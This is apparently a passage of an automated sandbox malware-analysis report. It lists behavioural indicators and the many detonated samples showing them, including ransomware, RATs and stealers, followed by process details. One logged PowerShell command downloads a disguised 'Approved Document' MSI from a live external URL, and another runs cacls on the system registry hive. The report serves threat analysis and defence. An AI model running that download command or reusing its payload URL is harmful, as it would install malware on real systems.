      • snd16061.exe (PID: 12744)
      • Printer_Driver_SSL_support_v43.22.209.99.exe (PID: 27664)
    • Reads the machine GUID from the registry

      • support.client.exe (PID: 2648)
      • dfsvc.exe (PID: 4704)
      • CFXBypass.exe (PID: 4316)
      • Silentum_Spoofer.exe (PID: 7884)
      • net_launcher.exe (PID: 2652)
      • CFXBypass.exe (PID: 5920)
      • v38438.exe (PID: 2676)
      • CFXBypass.exe (PID: 7780)
      • Silentum_Spoofer.exe (PID: 7488)
      • Silentum_Spoofer.exe (PID: 2220)
      • stub.exe (PID: 3536)
      • CryptoWall.exe (PID: 11896)
      • HorionInjector.exe (PID: 11724)
      • TempSpoofer.exe (PID: 11844)
      • he.exe (PID: 5564)
      • x834.exe (PID: 12312)
      • Violet.exe (PID: 11672)
      • hey.exe (PID: 8244)
      • Install.exe (PID: 14304)
      • TempSpoofer.exe (PID: 14084)
      • XClient.exe (PID: 14296)
      • Cloudy.exe (PID: 14380)
      • LOIC.exe (PID: 15040)
      • XClient.exe (PID: 15508)
      • XClient.exe (PID: 14920)
      • XClient.exe (PID: 16404)
      • XClient.exe (PID: 13440)
      • TempSpoofer.exe (PID: 13884)
      • XClient.exe (PID: 15128)
      • XClient.exe (PID: 14636)
      • XClient.exe (PID: 14624)
      • svchost.exe (PID: 14372)
      • LOIC.exe (PID: 14196)
      • svchost.exe (PID: 16520)
      • 3e3ev3.exe (PID: 17156)
      • svchost.exe (PID: 14544)
      • svchost.exe (PID: 16392)
      • requirements.exe (PID: 14264)
      • svchost.exe (PID: 7660)
      • Tinder%20Bot.exe (PID: 14604)
      • svchost.exe (PID: 14612)
      • svchost.exe (PID: 13460)
      • bnkrigkawd.exe (PID: 15452)
      • XClient.exe (PID: 14536)
      • cssgo.exe (PID: 14720)
      • steamerx.exe (PID: 15096)
      • Auo1.exe (PID: 13968)
      • AddMeFast%20Bot.exe (PID: 14036)
      • Yellow%20Pages%20Scraper.exe (PID: 14272)
      • Cloudy.exe (PID: 14860)
      • alphaTweaks.exe (PID: 15104)
      • ClipAid-Pro.exe (PID: 17652)
      • RuntimeBroker.exe (PID: 16960)
      • BootstrapperNew.exe (PID: 17164)
      • XClient.exe (PID: 15080)
      • svchost.exe (PID: 12464)
      • 1.exe (PID: 14584)
      • TempSpoofer.exe (PID: 13892)
      • Amus.exe (PID: 14728)
      • {34184A33-0407-212E-3300-09040709E2C2}.exe (PID: 19316)
      • TempSpoofer.exe (PID: 13996)
      • Petya.A.exe (PID: 20612)
      • svchost.exe (PID: 14680)
      • BootstrapperNew.exe (PID: 17148)
      • InfinityCrypt.exe (PID: 20676)
      • bypass.exe (PID: 20652)
      • WannaCry.exe (PID: 21048)
      • Client-built.exe (PID: 22148)
      • Steanings.exe (PID: 8076)
      • build.exe (PID: 23196)
      • beacon.exe (PID: 23272)
      • payload.exe (PID: 23172)
      • Steanings.exe (PID: 23180)
      • n743.exe (PID: 7352)
      • brbotnet.exe (PID: 16252)
      • brbotnet.exe (PID: 13572)
      • EdmsLauncher.exe (PID: 22800)
      • BruterV3.1.exe (PID: 25524)
      • chrome_update.exe (PID: 13944)
      • VOKLIGHTD.exe (PID: 25668)
      • justpoc.exe (PID: 20684)
      • taskmoder.exe (PID: 25576)
      • VOKLIGHT.exe (PID: 14016)
      • ScreenConnect.ClientSetup.exe (PID: 25560)
      • Pulsar-Client.exe (PID: 24080)
      • Solara.exe (PID: 12232)
      • ljgksdtihd.exe (PID: 22088)
      • Security.exe (PID: 25716)
      • Pulsar-Client.exe (PID: 21228)
      • Client.exe (PID: 16784)
      • SharpHound.exe (PID: 25640)
      • RegAsm.exe (PID: 25928)
      • conhost.exe (PID: 27168)
      • RegAsm.exe (PID: 28240)
    • Creates files or folders in the user directory

      • Taskmgr.exe (PID: 7712)
      • UniversalBrowser.exe (PID: 7800)
      • explorer.exe (PID: 4696)
      • dfsvc.exe (PID: 4704)
      • v38438.exe (PID: 2676)
      • he.exe (PID: 5564)
      • ybaCy8KVcyR0.exe (PID: 11364)
      • Guel+7KJvOKF.exe (PID: 11592)
      • Client.exe (PID: 11820)
      • explorer.exe (PID: 12440)
      • stub.exe (PID: 3536)
      • Axam.a.exe (PID: 2828)
      • CryptoLocker.exe (PID: 15536)
      • 444.exe (PID: 15056)
      • InfinityCrypt.exe (PID: 20676)
      • Amus.exe (PID: 14728)
      • n743.exe (PID: 7352)
      • Jigsaw.exe (PID: 16616)
      • Fast%20Download.exe (PID: 17644)
      • ExtremeInjector.exe (PID: 23300)
      • ljgksdtihd.exe (PID: 22088)
      • msiexec.exe (PID: 23232)
      • justpoc.exe (PID: 20684)
      • Agentnov.exe (PID: 12156)
      • snd16061.exe (PID: 12744)
      • ExtremeInjector.exe (PID: 23696)
      • CoronaVirus.exe (PID: 25648)
      • NAMUVPN32.exe (PID: 11180)
      • cheet.exe (PID: 25584)
    • Launching a file from the Startup directory

      • UniversalBrowser.exe (PID: 7800)
      • he.exe (PID: 5564)
      • ybaCy8KVcyR0.exe (PID: 11364)
      • Guel+7KJvOKF.exe (PID: 11592)
      • explorer.exe (PID: 12440)
      • Axam.a.exe (PID: 2828)
      • InfinityCrypt.exe (PID: 20676)
      • n743.exe (PID: 7352)
      • Fast%20Download.exe (PID: 17644)
      • CoronaVirus.exe (PID: 25648)
    • Launching a file from a Registry key

      • UniversalBrowser.exe (PID: 7800)
      • he.exe (PID: 5564)
      • ybaCy8KVcyR0.exe (PID: 11364)
      • Guel+7KJvOKF.exe (PID: 11592)
      • explorer.exe (PID: 12440)
      • reg.exe (PID: 12728)
      • Axam.a.exe (PID: 2828)
      • hell9o.exe (PID: 14452)
      • rxd_en_1.exe (PID: 14476)
      • rmd_en_1.exe (PID: 14076)
      • Serials_Checker.exe (PID: 20940)
      • rod_en_1.exe (PID: 16900)
      • {34184A33-0407-212E-3300-09040709E2C2}.exe (PID: 19316)
      • reg.exe (PID: 18712)
      • Serials_Checker.exe (PID: 22132)
      • WannaCry.exe (PID: 21048)
      • n743.exe (PID: 7352)
      • dxwebsetup.exe (PID: 22772)
      • Jigsaw.exe (PID: 16616)
      • FreeYoutubeDownloader.exe (PID: 23208)
      • Client.exe (PID: 25960)
      • Amus.exe (PID: 14728)
      • CoronaVirus.exe (PID: 25648)
      • FXServer.exe (PID: 16136)
      • Axam.exe (PID: 27044)
      • Axam.exe (PID: 16464)
    • Reads Internet Explorer settings

      • mshta.exe (PID: 6556)
      • mshta.exe (PID: 2576)
      • mshta.exe (PID: 7804)
      • mshta.exe (PID: 8264)
      • mshta.exe (PID: 2876)
      • mshta.exe (PID: 14220)
      • mshta.exe (PID: 14104)
      • mshta.exe (PID: 14068)
      • mshta.exe (PID: 15496)
      • mshta.exe (PID: 14552)
      • mshta.exe (PID: 14060)
      • mshta.exe (PID: 17092)
      • mshta.exe (PID: 17084)
      • mshta.exe (PID: 20596)
      • mshta.exe (PID: 22240)
      • mshta.exe (PID: 23312)
      • mshta.exe (PID: 22544)
    • Reads Environment values

      • dfsvc.exe (PID: 4704)
      • v38438.exe (PID: 2676)
      • net_launcher.exe (PID: 2652)
      • Silentum_Spoofer.exe (PID: 7884)
      • CFXBypass.exe (PID: 5920)
      • Silentum_Spoofer.exe (PID: 2220)
      • Silentum_Spoofer.exe (PID: 7488)
      • CFXBypass.exe (PID: 7780)
      • CFXBypass.exe (PID: 4316)
      • TempSpoofer.exe (PID: 11844)
      • 3e3ev3.exe (PID: 17156)
      • TempSpoofer.exe (PID: 14084)
      • alphaTweaks.exe (PID: 15104)
      • TempSpoofer.exe (PID: 13996)
      • bypass.exe (PID: 20652)
      • TempSpoofer.exe (PID: 13892)
      • bnkrigkawd.exe (PID: 15452)
      • HorionInjector.exe (PID: 11724)
      • payload.exe (PID: 23172)
      • chrome_update.exe (PID: 13944)
      • BruterV3.1.exe (PID: 25524)
      • Pulsar-Client.exe (PID: 24080)
      • Pulsar-Client.exe (PID: 21228)
      • x834.exe (PID: 12312)
      • up.exe (PID: 27180)
    • Disables trace logs

      • dfsvc.exe (PID: 4704)
      • net_launcher.exe (PID: 2652)
      • 3e3ev3.exe (PID: 17156)
      • cssgo.exe (PID: 14720)
      • bypass.exe (PID: 20652)
      • CFXBypass.exe (PID: 5920)
      • Silentum_Spoofer.exe (PID: 2220)
      • HorionInjector.exe (PID: 11724)
      • TempSpoofer.exe (PID: 11844)
      • Auo1.exe (PID: 13968)
      • payload.exe (PID: 23172)
      • alphaTweaks.exe (PID: 15104)
      • x834.exe (PID: 12312)
    • The sample compiled with portuguese language support

      • main.exe (PID: 2456)
    • The sample compiled with korean language support

      • main.exe (PID: 2456)
      • Client.exe (PID: 25960)
    • Process checks computer location settings

      • file_c8e4af3ea647650f.exe (PID: 4776)
      • Client.exe (PID: 11820)
      • G7_Update.exe (PID: 17120)
      • downloader.exe (PID: 14280)
      • assignment.exe (PID: 12576)
      • cfxre.exe (PID: 15064)
      • %D0%A4%D0%BE%D1%80%D0%BC%D0%B0%203%D0%9E%D0%A8%D0%91%D0%A0.exe (PID: 14688)
      • 2.exe (PID: 14436)
      • FXServer.exe (PID: 23216)
      • FreeYoutubeDownloader.exe (PID: 23208)
      • taskmoder.exe (PID: 25576)
    • PyInstaller has been detected (YARA)

      • main.exe (PID: 1904)
    • The sample compiled with polish language support

      • main.exe (PID: 2456)
    • NirSoft software is detected

      • nircmd.exe (PID: 14348)
    • Process checks whether UAC notifications are on

      • dfsvc.exe (PID: 4704)
      • 52.exe (PID: 25732)
      • Isass.exe (PID: 25708)
    • Attempt to connect to SMB server

      • Meredrop.exe (PID: 12820)
    • Attempting to connect via WebSocket

      • EmmetPROD.exe (PID: 15520)
    • Execution of CURL command

      • cmd.exe (PID: 21132)
      • cmd.exe (PID: 20888)
      • cmd.exe (PID: 22672)
      • cmd.exe (PID: 28904)
      • cmd.exe (PID: 28888)
    • Reads CPU info

      • InfinityCrypt.exe (PID: 20676)
    • Changes the display of characters in the console

      • cmd.exe (PID: 17128)
      • cmd.exe (PID: 14180)
      • cmd.exe (PID: 14696)
      • cmd.exe (PID: 18656)
      • cmd.exe (PID: 14868)
      • cmd.exe (PID: 23684)
      • cmd.exe (PID: 23188)
    • Converts byte array into Unicode string (POWERSHELL)

      • powershell.exe (PID: 11556)
      • powershell.exe (PID: 11568)
    • User-Agent configuration (POWERSHELL)

      • powershell.exe (PID: 11556)
    • Starts MODE.COM to configure console settings

      • mode.com (PID: 23428)
      • mode.com (PID: 13164)
    • Creates a software uninstall entry

      • FreeYoutubeDownloader.exe (PID: 23208)
    • DATTO has been detected

      • main.exe (PID: 2456)
    • Manual execution by a user

      • msdt.exe (PID: 26432)
      • powershell.exe (PID: 21952)
    • Reads mouse settings

      • AutoIt3.exe (PID: 12904)
      • GMSSetupX86.exe (PID: 25540)
    • Attempting to use instant messaging service

      • Silentum_Spoofer.exe (PID: 7884)
      • CFXBypass.exe (PID: 4316)
      • CFXBypass.exe (PID: 5920)
      • Silentum_Spoofer.exe (PID: 2220)
      • CFXBypass.exe (PID: 7780)
      • Silentum_Spoofer.exe (PID: 7488)
    • Creating file in SysWOW64

      • 640.exe (PID: 17200)
    • The sample compiled with Italian language support

      • main.exe (PID: 2456)
    • TEAMVIEWER has been detected

      • main.exe (PID: 2456)
    • Drops encrypted VBS script (Microsoft Script Encoder)

      • Agentnov.exe (PID: 12156)
    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 11828)
      • powershell.exe (PID: 7356)
      • powershell.exe (PID: 16200)
    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 14120)
      • powershell.exe (PID: 15488)
    • Uses string replace method (POWERSHELL)

      • powershell.exe (PID: 16200)
    • Converts byte array into ASCII string (POWERSHELL)

      • powershell.exe (PID: 14672)
    • Checks if a key exists in the options dictionary (POWERSHELL)

      • Silentum_Spoofer.exe (PID: 7884)
      • CFXBypass.exe (PID: 7780)
    • Reads product name

      • up.exe (PID: 27180)
    • SEETROL has been detected

      • ClientRun.exe (PID: 27280)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Win64 Executable (generic) (87.3)
.exe | Generic Win/DOS Executable (6.3)
.exe | DOS Executable Generic (6.3)

EXIF

EXE

MachineType: AMD AMD64
TimeStamp: 2025:06:19 18:59:12+00:00
ImageFileCharacteristics: Executable, Large address aware
PEType: PE32+
LinkerVersion: 14.43
CodeSize: 178688
InitializedDataSize: 154624
UninitializedDataSize: -
EntryPoint: 0xc380
OSVersion: 6
ImageVersion: -
SubsystemVersion: 6
Subsystem: Windows command line
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
846
Monitored processes
722
Malicious processes
63
Suspicious processes
56

Behavior graph

Click at the process to see the details
start main.exe conhost.exe no specs #GENERIC main.exe cmd.exe schtasks.exe no specs cmd.exe no specs #CRYPTOWALL taskmgr.exe no specs support.client.exe no specs #SCREENCONNECT dfsvc.exe vnc.exe no specs conhost.exe no specs #PHISHING svchost.exe wscript.exe no specs wscript.exe no specs nk.exe file_c8e4af3ea647650f.exe #ADAPTIXC2 agent.x64.exe conhost.exe no specs silentum_spoofer.exe stub.exe silentum_spoofer.exe mshta.exe no specs silentum_spoofer.exe mshta.exe no specs cfxbypass.exe cfxbypass.exe net_launcher.exe mshta.exe no specs cfxbypass.exe v38438.exe #GENERIC universalbrowser.exe powershell.exe no specs #XWORM he.exe #NJRAT n743.exe conhost.exe no specs mshta.exe no specs mshta.exe no specs s287.exe wscript.exe no specs ybacy8kvcyr0.exe brontok.exe no specs powershell.exe no specs conhost.exe no specs conhost.exe no specs powershell.exe no specs powershell.exe no specs guel+7kjvokf.exe conhost.exe no specs bugsoft.exe no specs powershell.exe no specs pieletjf_vm.exe no specs #XWORM violet.exe cmd.exe no specs powershell.exe no specs horioninjector.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe no specs qbix01.exe cmd.exe no specs #XENORAT client.exe powershell.exe no specs tempspoofer.exe conhost.exe no specs powershell.exe no specs cmd.exe no specs cryptowall.exe no specs THREAT powershell.exe no specs conhost.exe no specs conhost.exe no specs conhost.exe no specs conhost.exe no specs conhost.exe no specs conhost.exe no specs conhost.exe no specs conhost.exe no specs conhost.exe no specs powershell.exe no specs #XWORM hey.exe #GENERIC axam.a.exe conhost.exe no specs cmd.exe powershell.exe no specs fodhelper.exe no specs x834.exe no specs pieletjf.exe no specs conhost.exe no specs #CRYPTOWALL explorer.exe pe2shc.exe no specs conhost.exe no specs conhost.exe no specs reg.exe winvnc.exe svchost.exe svchost.exe conhost.exe no specs cmd.exe tempspoofer.exe no specs violet.exe no specs chrome_update.exe no specs powershell.exe no specs prolin.exe auo1.exe 01.exe powershell.exe no specs tempspoofer.exe no specs mshta.exe no specs keepon.exe no specs powershell.exe no specs writedat.exe no specs addmefast%20bot.exe no specs powershell.exe no specs keygen.exe no specs mshta.exe no specs mshta.exe no specs rmd_en_1.exe tempspoofer.exe lab01-02.exe no specs mshta.exe no specs cmd.exe no specs powershell.exe no specs 444.exe no specs powershell.exe no specs powershell.exe no specs cmd.exe no specs process-injection.exe no specs cmd.exe no specs cmd.exe no specs powershell.exe no specs loic.exe no specs cmd.exe no specs powershell.exe no specs mshta.exe no specs powershell.exe no specs 1223.exe cmd.exe no specs hack.exe no specs requirements.exe no specs yellow%20pages%20scraper.exe no specs downloader.exe no specs agent.exe xclient.exe no specs install.exe no specs doitallmain.exe no specs pdf%20reader.exe no specs setup.exe no specs vikings.exe no specs 7z.exe no specs #GENERIC assignment.exe update.exe no specs loader.exe no specs sunwukongs.exe no specs kg.exe no specs svchost.exe no specs svchost.exe no specs xclient.exe no specs svchost.exe no specs kdmapper_release.exe no specs brbotnet.exe no specs setup.exe no specs 444.exe no specs access.exe mimilove.exe no specs #SMBSCAN meredrop.exe standalone_payload.exe aaozznaq.exe no specs nircmd.exe no specs btpc.exe no specs access.exe svchost.exe no specs cloudy.exe no specs powershell.exe no specs conhost.exe no specs 2.exe hell9o.exe conhost.exe no specs rxd_en_1.exe conhost.exe no specs conhost.exe no specs conhost.exe no specs cmd.exe no specs xclient.exe no specs svchost.exe no specs mshta.exe no specs test.exe plantrojan.exe hack1226.exe no specs 1.exe donut.exe no specs tinder%20bot.exe no specs svchost.exe no specs mport.exe no specs xclient.exe no specs xclient.exe no specs rickroll.exe no specs ogfn%20updater.exe no specs njrat.exe no specs powershell.exe no specs svchost.exe no specs %d0%a4%d0%be%d1%80%d0%bc%d0%b0%203%d0%9e%d0%a8%d0%91%d0%a0.exe cmd.exe no specs uac_bypass.exe no specs self-injection.exe no specs cssgo.exe #GENERIC amus.exe conhost.exe no specs conhost.exe no specs wildfire-test-pe-file.exe no specs conhost.exe no specs conhost.exe no specs popapoers.exe conhost.exe no specs bexitor%20installer.exe conhost.exe no specs powershell.exe no specs THREAT powershell.exe no specs anap.a.exe no specs powershell.exe no specs cloudy.exe no specs cmd.exe no specs powershell.exe no specs conhost.exe no specs conhost.exe no specs conhost.exe no specs conhost.exe no specs xclient.exe no specs conhost.exe no specs jeditor.exe edmslaunchersetup.exe conhost.exe no specs conhost.exe no specs conhost.exe no specs #NJRAT fast%20download.exe no specs test.exe loic.exe no specs winsetaccess64.exe no specs 444.exe #CRYPTOWALL cfxre.exe loader.exe no specs xclient.exe no specs steamerx.exe no specs alphatweaks.exe no specs conhost.exe no specs shell.exe xclient.exe no specs konsol.exe no specs txmclygo.exe no specs conhost.exe no specs conhost.exe no specs conhost.exe no specs conhost.exe no specs conhost.exe no specs conhost.exe no specs conhost.exe no specs conhost.exe no specs conhost.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs conhost.exe no specs tempspoofer.exe no specs cmd.exe no specs conhost.exe no specs bnkrigkawd.exe powershell.exe no specs world%20of%20tanks.exe doublepulsar-1.3.1.exe no specs powershell.exe mshta.exe no specs xclient.exe no specs emmetprod.exe cryptolocker.exe dajoke2.exe no specs conhost.exe no specs conhost.exe no specs conhost.exe no specs conhost.exe no specs nc64.exe no specs conhost.exe no specs conhost.exe no specs conhost.exe no specs conhost.exe no specs script.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs brbotnet.exe no specs conhost.exe no specs conhost.exe no specs outlook.exe no specs svchost.exe no specs xclient.exe no specs net.exe no specs conhost.exe no specs conhost.exe no specs conhost.exe no specs svchost.exe no specs conhost.exe no specs conhost.exe no specs conhost.exe no specs #XENORAT client.exe no specs conhost.exe no specs conhost.exe no specs conhost.exe no specs 444.exe no specs pclient.exe no specs runtimebroker.exe no specs mova.exe no specs conhost.exe no specs memz.exe no specs conhost.exe no specs kdmapper_release.exe no specs conhost.exe no specs service.exe zke-nfoview.exe no specs mshta.exe no specs mshta.exe no specs backdoor.exe no specs connector1.exe g7_update.exe no specs cmd.exe no specs bootstrappernew.exe 3e3ev3.exe bootstrappernew.exe no specs conhost.exe no specs conhost.exe no specs conhost.exe no specs werfault.exe no specs conhost.exe no specs conhost.exe no specs conhost.exe no specs #NJRAT fast%20download.exe clipaid-pro.exe no specs cmd.exe rexcel~1.exe no specs conhost.exe no specs aaozznaq.exe mspaint.exe no specs conhost.exe no specs werfault.exe no specs cmd.exe no specs setup.exe cmd.exe no specs {34184a33-0407-212e-3300-09040709e2c2}.exe haeum.exe rod_en_1.exe conhost.exe no specs werfault.exe no specs net1.exe no specs werfault.exe no specs cmd.exe no specs 7b94.tmp no specs mshta.exe no specs petya.a.exe no specs cmd.exe no specs sanghyun.exe no specs win.exe no specs calendar.exe bypass.exe pardufrigi_installer_1.0.p1.exe better.exe no specs infinitycrypt.exe justpoc.exe pk.exe no specs wmic.exe no specs cmd.exe no specs cmd.exe no specs serials_checker.exe agambxya.exe no specs conhost.exe no specs conhost.exe no specs safman_setup.exe no specs sanghyun-guest.exe no specs conhost.exe no specs #STEALC build1.exe no specs conhost.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs conhost.exe no specs conhost.exe no specs cmd.exe no specs is-f7nco.tmp cmd.exe no specs reg.exe no specs {34184a33-0407-212e-3300-09040709e2c2}.exe no specs conhost.exe no specs curl.exe rmo_se~2.exe cmd.exe no specs pcclear_eng_mini.exe %e5%88%92%e5%ad%a6%e5%8f%b7v2--%e6%9e%81%e9%80%9f%e7%89%88.exe crypted.exe no specs powershell.exe no specs safman_setup.tmp no specs conhost.exe no specs curl.exe is-hvp5b.tmp pardufrigi_installer_1.0.p1.tmp ljgksdtihd.exe #REMCOS prueba.exe serials_checker.exe cleanup_tool.exe no specs #QUASAR client-built.exe no specs v4343.exe no specs mshta.exe no specs werfault.exe no specs conhost.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs conhost.exe no specs zke-ascv.exe no specs #JIGSAW jigsaw.exe services.exe no specs iatinfect2008_64.exe no specs file.exe no specs upm2008.exe no specs #WANNACRY wannacry.exe processhide32.exe no specs steanings.exe explorer.exe no specs rundll32.exe no specs reg.exe no specs explorer.exe no specs conhost.exe no specs conhost.exe no specs conhost.exe no specs cmd.exe no specs chcp.com no specs powershell.exe no specs cmd.exe no specs dxwebsetup.exe edmslauncher.exe no specs conhost.exe no specs powershell.exe no specs payload.exe no specs steanings.exe cmd.exe no specs build.exe freeyoutubedownloader.exe #REMCOS fxserver.exe #EMOTET 640.exe no specs msiexec.exe msiexec.exe no specs msiexec.exe no specs #MINER xblkpfz8y4.exe beacon.exe powershell.exe no specs powershell.exe no specs extremeinjector.exe mshta.exe no specs #REMCOS prueba.exe no specs powershell.exe no specs powerrat.exe no specs builder.exe no specs conhost.exe no specs #EMOTET 640.exe conhost.exe no specs conhost.exe no specs conhost.exe no specs cacls.exe no specs order_pdf.exe no specs srtware.exe no specs conhost.exe no specs dxwsetup.exe schtasks.exe no specs conhost.exe no specs mode.com no specs pfntjejghjsdkr.exe no specs powershell.exe no specs cmd.exe no specs extremeinjector.exe conhost.exe no specs curl.exe no specs conhost.exe no specs conhost.exe no specs conhost.exe no specs mode.com no specs conhost.exe no specs pdf.exe no specs svchost.exe no specs redlinestealer.exe no specs bruterv3.1.exe no specs gmssetupx86.exe no specs privacypolicy.exe screenconnect.clientsetup.exe no specs taskmoder.exe no specs cheet.exe builder.exe no specs pulsar-client.exe no specs pulsar-client.exe no specs namuvpn7.exe no specs THREAT putty.exe no specs solara.exe 5252.exe mvc3.exe cock.exe no specs autoit3.exe no specs updater.exe gertgherthre.exe cmd.exe no specs THREAT powershell.exe no specs THREAT powershell.exe no specs explorer.exe no specs complexo%20v4.exe no specs ksv.exe cock.exe no specs THREAT powershell.exe no specs voklight.exe bot.exe no specs powershell.exe no specs mshta.exe no specs cvf.exe no specs rustme.exe no specs black.exe namuvpnx2.exe no specs sharphound.exe no specs #CRYPTOWALL coronavirus.exe voklightd.exe rsvp_invite%23903388.exe pinaview.exe a.exe no specs isass.exe no specs security.exe powerrat.exe no specs 52.exe no specs conhost.exe no specs schtasks.exe no specs xerox01_pdf.exe no specs client.exe conhost.exe no specs conhost.exe no specs conhost.exe no specs conhost.exe no specs conhost.exe no specs msiexec.exe no specs regasm.exe no specs hive%20ransomware.exe no specs #NOESCAPE noescape.exe no specs isass.exe no specs conhost.exe no specs conhost.exe no specs conhost.exe no specs powershell.exe no specs cmd.exe no specs benzmonster.exe no specs chcp.com no specs chcp.com no specs #FORMBOOK msdt.exe no specs conhost.exe no specs conhost.exe no specs conhost.exe no specs powershell.exe no specs aspnet_regiis.exe powershell.exe no specs chcp.com no specs conhost.exe no specs conhost.exe no specs cmd.exe no specs chcp.com no specs conhost.exe no specs up.exe no specs clientrun.exe no specs conhost.exe no specs axam.exe conhost.exe no specs conhost.exe no specs #EMOTET paramssps.exe no specs rambledmime.exe no specs pxray_cast_sort.exe no specs nomoreransom.exe no specs lol.exe no specs windows.x64.silent.cpu.exe no specs mimikatz.exe no specs rustmedebyg.exe no specs bnoaprihjatuasss.exe no specs fastping_silent_v4.exe phantom.exe no specs reevloader.exe no specs agentnov.exe namuvpn32.exe axam.exe conhost.exe no specs msiexec.exe no specs conhost.exe no specs msiexec.exe no specs 4j8576a0e8v3.exe no specs msiexec.exe no specs cmd.exe no specs steamcmd.exe no specs 1210.exe no specs namu832.exe no specs printer_driver_ssl_support_v43.22.209.99.exe crypted_c360a5b7.exe no specs autoupdate.exe no specs cg100.exe no specs bsg.exe no specs vltktanthutn.exe no specs offeredbuilt.exe no specs lol1.exe no specs msiexec.exe no specs 123123.exe no specs lol11.exe no specs conhost.exe no specs netsh.exe no specs regasm.exe no specs 4j8576a0e8v3.exe no specs powershell.exe no specs conhost.exe no specs conhost.exe no specs conhost.exe no specs conhost.exe no specs privacypolicy.tmp snd16061.exe chromeupdate.exe no specs cmd.exe no specs #EMOTET paramssps.exe chcp.com no specs pinaview.tmp no specs autoguarder_2.3.7.350.exe no specs chatlife.exe no specs garo%20x.exe no specs quizpokemon.exe no specs chrome_update_old.exe no specs system.exe no specs windowsupdate.exe no specs riende.exe no specs conhost.exe no specs cvf.exe no specs conhost.exe no specs 1yne5z9p.exe no specs injector.exe no specs zintask.exe regasm.exe no specs explorer.exe no specs fo-wsftp605.exe no specs 1488.exe no specs launcherloader.exe no specs sgn.exe no specs lukejazz.exe no specs rdpw_installer.exe no specs critscript.exe imgs.exe no specs shellhost.exe no specs randll32.exe no specs msiexec.exe no specs cmd.exe no specs axam.exe no specs #REMCOS fxserver.exe werfault.exe no specs conhost.exe no specs pl4760.tmp no specs sc.exe no specs free youtube downloader.exe no specs regasm.exe no specs conhost.exe no specs conhost.exe no specs csc.exe no specs mvc3.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs wmic.exe no specs aspnet_regiis.exe no specs werfault.exe no specs taskkill.exe no specs cmd.exe no specs conhost.exe no specs conhost.exe no specs setup.exe no specs conhost.exe no specs conhost.exe no specs svchost.com no specs conhost.exe no specs conhost.exe no specs chcp.com no specs setup.exe no specs conhost.exe no specs cmd.exe no specs powershell.exe findstr.exe no specs 1488.exe no specs compiled.exe no specs sc.exe no specs installutil.exe no specs openwith.exe no specs axam.exe no specs findstr.exe no specs findstr.exe no specs cmd.exe no specs findstr.exe no specs netsh.exe no specs installutil.exe no specs curl.exe no specs javaw.exe no specs zubovlekciya.exe no specs conhost.exe no specs conhost.exe no specs conhost.exe no specs explorer.exe no specs curl.exe no specs cmd.exe no specs werfault.exe no specs findstr.exe no specs powershell.exe no specs find.exe no specs werfault.exe no specs netsh.exe no specs conhost.exe conhost.exe conhost.exe sihost.exe explorer.exe main.exe no specs runtimebroker.exe runtimebroker.exe runtimebroker.exe ctfmon.exe runtimebroker.exe conhost.exe conhost.exe

Process information

PID
CMD
Path
Indicators
Parent process
760\??\C:\WINDOWS\system32\conhost.exe 0x4C:\Windows\System32\conhost.exe
winrshost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
784\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1108"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Invoke-WebRequest -Uri 'https://pub-bbbdebc2599c4d74b04c5d53e439f7a7.r2.dev/Approved%20Document%23D53LU.msi' -OutFile 'C:\Users\admin\AppData\Local\Temp\installer.msi' -UseBasicParsing"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exewscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1116"C:\WINDOWS\system32\cacls.exe" "C:\WINDOWS\system32\config\system"C:\Windows\System32\cacls.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Control ACLs Program
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cacls.exe
c:\windows\system32\ntdll.dll
